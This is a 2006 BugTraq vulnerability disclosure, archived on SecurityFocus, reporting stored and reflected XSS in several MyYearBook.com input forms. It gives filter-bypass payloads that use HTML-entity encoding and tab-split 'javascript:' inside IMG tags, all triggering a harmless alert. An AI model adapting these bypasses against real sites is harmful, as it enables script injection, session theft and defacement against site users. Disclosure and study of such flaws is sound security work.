BugTraq
MyYearBook.com - XSS May 25 2006 11:21PM
luny youfucktard com
MyYearBook.com - Personal community site like myspace.com

Effected files:

Input forms of:

editing profile

posting a blog

search boxes

posting a bulletin

posting a comment

---------------------------

XSS Vulnerabilities proof of concept:

When editing your profile, it seems <script> tags are filtered to <notallowed> tags, and javascript is filtered to the word not allowed. To by pass this we can convert the script tags or the word javascript by using hex encoding. Below are following examples of places where user submitted data isn't properlly filtered before being dynamically generated.

Profile input:

All the user has to do is put the following in any input box in his profile: <IMG SRC=javascript:a&
#108;ert('XSS')>

Blog subject input:

<IMG SRC="jav ascript:alert('XSS');">

Photo caption input:

Same as above.

<IMG SRC="jav ascript:alert('XSS');">

Any search box input:

"><IMG SRC="jav ascript:alert('XSS');"><"

Posting a bulletin input:

In the message input box the following works:

<IMG SRC=javascript:a&
#108;ert('XSS')>

Posting a comment:

<IMG SRC="jav ascript:alert('XSS');">

Make sure tab is enabled.

------------------------------------------------

Luny - http://www.youfucktard.com

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus